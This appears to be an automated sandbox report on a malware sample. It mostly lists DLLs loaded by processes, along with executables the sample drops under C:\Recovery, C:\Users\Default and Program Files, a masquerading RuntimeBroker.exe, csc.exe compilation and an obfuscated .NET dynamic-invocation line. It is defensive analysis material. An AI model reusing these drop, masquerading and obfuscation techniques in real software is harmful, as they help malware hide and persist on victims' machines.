                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mscoree.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: kernel.appcore.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: version.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: windows.storage.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: wldp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: profapi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptsp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rsaenh.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptbase.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: sspicli.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mscoree.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: apphelp.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: version.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: windows.storage.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: wldp.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: profapi.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptbase.dll
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: sspicli.dll
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: mscoree.dll
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: version.dll
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: windows.storage.dll
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: wldp.dll
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: profapi.dll
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: cryptbase.dll
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: sspicli.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mscoree.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: kernel.appcore.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: version.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: windows.storage.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: wldp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: profapi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptsp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rsaenh.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptbase.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: sspicli.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ktmw32.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: uxtheme.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: propsys.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: edputil.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: urlmon.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: iertutil.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: srvcli.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: netutils.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: wintypes.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: appresolver.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: bcp47langs.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: slc.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: userenv.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: sppc.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mpr.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: pcacli.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: sfc_os.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mscoree.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: kernel.appcore.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: version.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: windows.storage.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: wldp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: profapi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptsp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rsaenh.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptbase.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: sspicli.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ktmw32.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: wbemcomn.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: amsi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: userenv.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: iphlpapi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: dnsapi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: winnsi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rasapi32.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rasman.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rtutils.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mswsock.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: winhttp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rasadhlp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: fwpuclnt.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: uxtheme.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: winmm.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: winmmbase.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mmdevapi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: devobj.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ksuser.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: avrt.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: audioses.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: powrprof.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: umpdc.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: msacm32.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: midimap.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: dwrite.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: edputil.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: windowscodecs.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ntmarta.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: dpapi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: secur32.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: schannel.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mskeyprotect.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ntasn1.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ncrypt.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ncryptsslp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: msasn1.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exeJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\9da3c047e935b1Jump to behavior
                          Source: W4tW72sfAD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: W4tW72sfAD.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: W4tW72sfAD.exeStatic file information: File size 2079744 > 1048576
                          Source: W4tW72sfAD.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1fb400
                          Source: W4tW72sfAD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.pdb source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs.Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.L89zNPJrMt(16777336)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.L89zNPJrMt(16777247)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.L89zNPJrMt(16777264))})
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeCode function: 0_2_00007FFD9BA14ED4 push eax; ret 0_2_00007FFD9BA14ED5
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeCode function: 0_2_00007FFD9BC5AC30 pushad ; iretd 0_2_00007FFD9BC5AC31
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeCode function: 0_2_00007FFD9BC57BF2 push eax; iretd 0_2_00007FFD9BC57C91
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeCode function: 0_2_00007FFD9BC591FA pushad ; retf 0_2_00007FFD9BC59229
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeCode function: 0_2_00007FFD9BC629B5 pushad ; iretd 0_2_00007FFD9BC629B6
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeCode function: 0_2_00007FFD9BC501CE push cs; ret 0_2_00007FFD9BC501CF
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeCode function: 0_2_00007FFD9BC57964 push ebx; retf 0_2_00007FFD9BC5796A
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeCode function: 0_2_00007FFD9BC5F123 push eax; iretd 0_2_00007FFD9BC5F124
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeCode function: 0_2_00007FFD9BC5812C push ebx; ret 0_2_00007FFD9BC5816A
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeCode function: 0_2_00007FFD9BC53C61 pushfd ; ret 0_2_00007FFD9BC53C7A
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 19_2_00007FFD9B8996D3 push FFFFFFE8h; ret 19_2_00007FFD9B8996F9
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 19_2_00007FFD9B8C3B2B push eax; ret 19_2_00007FFD9B8C3B34
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 19_2_00007FFD9B8C9E6A push eax; ret 19_2_00007FFD9B8C9E7D
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 19_2_00007FFD9B8C9DFA push eax; ret 19_2_00007FFD9B8C9E7D
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 20_2_00007FFD9B8996D3 push FFFFFFE8h; ret 20_2_00007FFD9B8996F9
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 20_2_00007FFD9B8C3B2B push eax; ret 20_2_00007FFD9B8C3B34
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 20_2_00007FFD9B8C9E6A push eax; ret 20_2_00007FFD9B8C9E7D
